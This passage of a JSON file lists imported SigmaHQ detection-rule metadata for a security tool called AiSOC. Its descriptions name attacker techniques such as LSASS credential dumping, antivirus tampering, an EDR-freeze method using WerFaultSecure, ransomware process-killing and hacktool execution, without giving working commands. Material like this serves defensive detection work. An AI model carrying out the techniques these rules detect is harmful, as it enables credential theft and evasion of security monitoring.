This means protection against viruses, spyware, and other potentially unwanted software is disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-grace-period-expired.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "360a1340-398a-46b6-8d06-99b905dc69d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_antimalware_platform_expired.yml" } }, { "id": "sigmahq-sigma-36210e0d-5b19-485d-a087-c096088885f0", "type": "detection", "name": "Suspicious PowerShell Parameter Substring", "description": "Detects suspicious PowerShell invocation with a parameter substring", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-parameter-substring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36210e0d-5b19-485d-a087-c096088885f0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" } }, { "id": "sigmahq-sigma-36388120-b3f1-4ce9-b50b-280d9a7f4c04", "type": "detection", "name": "Kaspersky Endpoint Security Stopped Via 
CommandLine - Linux", "description": "Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl.\nThis activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kaspersky-endpoint-security-stopped-via-commandline-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36388120-b3f1-4ce9-b50b-280d9a7f4c04", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_av_kaspersky_av_disabled.yml" } }, { "id": "sigmahq-sigma-363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "type": "detection", "name": "Powershell Create Scheduled Task", "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-create-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" } }, { "id": "sigmahq-sigma-36440e1c-5c22-467a-889b-593e66498472", "type": "detection", "name": "Malicious IP Address Sign-In Suspicious", "description": "Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-ip-address-sign-in-suspicious.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36440e1c-5c22-467a-889b-593e66498472", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml" } }, { "id": "sigmahq-sigma-36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", "type": "detection", "name": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/syncappvpublishingserver-vbs-execute-arbitrary-powershell-code.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" } }, { "id": "sigmahq-sigma-36480ae1-a1cb-4eaa-a0d6-29801d7e9142", "type": "detection", "name": "Potential Defense Evasion Via Binary Rename", "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-via-binary-rename.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_binary.yml" } }, { "id": "sigmahq-sigma-3669afd2-9891-4534-a626-e5cf03810a61", "type": "detection", "name": "Load Of RstrtMgr.DLL By An Uncommon Process", "description": "Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.\nThis library has been used during ransomware campaigns to kill processes that 
would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.\nIt could also be used for anti-analysis purposes by shut downing specific processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1486", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/load-of-rstrtmgr-dll-by-an-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3669afd2-9891-4534-a626-e5cf03810a61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_rstrtmgr_uncommon_load.yml" } }, { "id": "sigmahq-sigma-36803969-5421-41ec-b92f-8500f79c23b0", "type": "detection", "name": "Potential Persistence Via GlobalFlags", "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-globalflags.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36803969-5421-41ec-b92f-8500f79c23b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml" } }, { "id": "sigmahq-sigma-36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", "type": "detection", "name": "Relevant ClamAV Message", "description": "Detects relevant ClamAV messages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1588.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/relevant-clamav-message.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml" } }, { "id": "sigmahq-sigma-36bed6b2-e9a0-4fff-beeb-413a92b86138", "type": "detection", "name": "Active Directory Computers Enumeration With Get-AdComputer", "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers or properties within Active Directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-computers-enumeration-with-get-adcomputer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36bed6b2-e9a0-4fff-beeb-413a92b86138", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" } }, { "id": "sigmahq-sigma-36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "type": "detection", "name": "HackTool - CreateMiniDump Execution", "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-createminidump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" } }, { "id": "sigmahq-sigma-36e037c4-c228-4866-b6a3-48eb292b9955", "type": "detection", "name": "DNS Query Request By Regsvr32.EXE", "description": "Detects DNS queries initiated by \"Regsvr32.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559.001", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-request-by-regsvr32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36e037c4-c228-4866-b6a3-48eb292b9955", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_regsvr32_dns_query.yml" } }, { "id": "sigmahq-sigma-36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "type": "detection", "name": "Code Executed Via Office Add-in XLL File", "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/code-executed-via-office-add-in-xll-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" } }, { "id": "sigmahq-sigma-37222991-11e9-4b6d-8bdf-60fbe48f753e", "type": "detection", "name": "Overwriting the File with Dev Zero or Null", "description": "Detects overwriting (effectively wiping/deleting) of a file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/overwriting-the-file-with-dev-zero-or-null.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"37222991-11e9-4b6d-8bdf-60fbe48f753e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_dd_delete_file.yml" } }, { "id": "sigmahq-sigma-3735d5ac-d770-4da0-99ff-156b180bc600", "type": "detection", "name": "Potential CCleanerReactivator.DLL Sideloading", "description": "Detects potential DLL sideloading of \"CCleanerReactivator.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ccleanerreactivator-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3735d5ac-d770-4da0-99ff-156b180bc600", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_ccleaner_reactivator.yml" } }, { "id": "sigmahq-sigma-3761e026-f259-44e6-8826-719ed8079408", "type": "detection", "name": "Linux Network Service Scanning - Auditd", "description": "Detects enumeration of local or remote network services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-network-service-scanning-auditd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "3761e026-f259-44e6-8826-719ed8079408", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_network_service_scanning.yml" } }, { "id": "sigmahq-sigma-37651c2a-42cd-4a69-ae0d-22a4349aa04a", "type": "detection", "name": "Unsigned AppX Installation Attempt Using Add-AppxPackage", "description": "Detects usage of the \"Add-AppxPackage\" cmdlet or its alias \"Add-AppPackage\" to install unsigned AppX packages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-appx-installation-attempt-using-add-appxpackage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml" } }, { "id": "sigmahq-sigma-37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "type": "detection", "name": "Suspicious Volume Shadow Copy Vssapi.dll Load", "description": "Detects the image load of the VSS DLL by uncommon executables", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-volume-shadow-copy-vssapi-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_vssapi_susp_load.yml" } }, { "id": "sigmahq-sigma-377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", "type": "detection", "name": "Suspicious VSFTPD Error Messages", "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-vsftpd-error-messages.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml" } }, { "id": "sigmahq-sigma-378a05d8-963c-46c9-bcce-13c7657eac99", "type": "detection", "name": "Potentially Suspicious Electron Application CommandLine", "description": "Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). 
This could be a sign of abuse to proxy execution through a signed binary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-electron-application-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "378a05d8-963c-46c9-bcce-13c7657eac99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml" } }, { "id": "sigmahq-sigma-379fa130-190e-4c3f-b7bc-6c8e834485f3", "type": "detection", "name": "File Deletion Via Del", "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-deletion-via-del.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "379fa130-190e-4c3f-b7bc-6c8e834485f3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_del_execution.yml" } }, { "id": "sigmahq-sigma-37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", "type": "detection", "name": "Allow RDP Remote Assistance Feature", "description": "Detects enabling of the RDP Remote Assistance feature, which allows a specific user to connect via RDP to the targeted machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/allow-rdp-remote-assistance-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" } }, { "id": "sigmahq-sigma-37c1333a-a0db-48be-b64b-7393b2386e3b", "type": "detection", "name": "Hacktool Execution - PE Metadata", "description": "Detects the execution of different Windows-based hacktools via PE metadata (company, product, etc.) 
even if the files have been renamed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588.002", "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-execution-pe-metadata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37c1333a-a0db-48be-b64b-7393b2386e3b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml" } }, { "id": "sigmahq-sigma-37db85d1-b089-490a-a59a-c7b6f984f480", "type": "detection", "name": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", "description": "Detects usage of \"findstr\" with the argument \"385201\". 
This could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-discovery-via-default-driver-altitude-using-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37db85d1-b089-490a-a59a-c7b6f984f480", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" } }, { "id": "sigmahq-sigma-37e4024a-6c80-4d8f-b95d-2e7e94f3a8d1", "type": "detection", "name": "Outbound Network Connection Initiated By Microsoft Dialer", "description": "Detects outbound network connections initiated by Microsoft Dialer.\nThe Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. 
Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.\nThis is an outdated process in the current context of its usage and is a common target for info stealers for process injection; it is also used to make C2 connections, a common example being \"Rhadamanthys\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outbound-network-connection-initiated-by-microsoft-dialer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37e4024a-6c80-4d8f-b95d-2e7e94f3a8d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_dialer_initiated_connection.yml" } }, { "id": "sigmahq-sigma-37e8d358-6408-4853-82f4-98333fca7014", "type": "detection", "name": "Remote Access Tool - NetSupport Execution From Unusual Location", "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-netsupport-execution-from-unusual-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "37e8d358-6408-4853-82f4-98333fca7014", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" } }, { "id": "sigmahq-sigma-38360161-76c4-4283-842e-efcf997dafc8", "type": "detection", "name": "Suspicious Login Activity Classified By Google", "description": "Detects Google Workspace login activity that's classified as suspicious by Google.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-login-activity-classified-by-google.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38360161-76c4-4283-842e-efcf997dafc8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/login/gcp_gworkspace_suspicious_login.yml" } }, { "id": "sigmahq-sigma-38646daa-e78f-4ace-9de0-55547b2d30da", "type": "detection", "name": "PUA - Seatbelt Execution", "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1526", "T1087", "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-seatbelt-execution.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38646daa-e78f-4ace-9de0-55547b2d30da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" } }, { "id": "sigmahq-sigma-387df17d-3b04-448f-8669-9e7fd5e5fd8c", "type": "detection", "name": "Suspicious Process Access of MsMpEng by WerFaultSecure - EDR-Freeze", "description": "Detects process access events where WerFaultSecure accesses MsMpEng.exe with dbgcore.dll or dbghelp.dll in the call trace, indicating potential EDR freeze techniques.\nThis technique leverages WerFaultSecure.exe running as a Protected Process Light (PPL) with WinTCB protection level to call MiniDumpWriteDump and suspend EDR/AV processes, allowing malicious activity to execute undetected during the suspension period.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-access-of-msmpeng-by-werfaultsecure-edr-freeze.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "387df17d-3b04-448f-8669-9e7fd5e5fd8c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access.yml" } }, { "id": "sigmahq-sigma-3883d9a0-fd0f-440f-afbb-445a2a799bb8", "type": "detection", "name": "Github Secret 
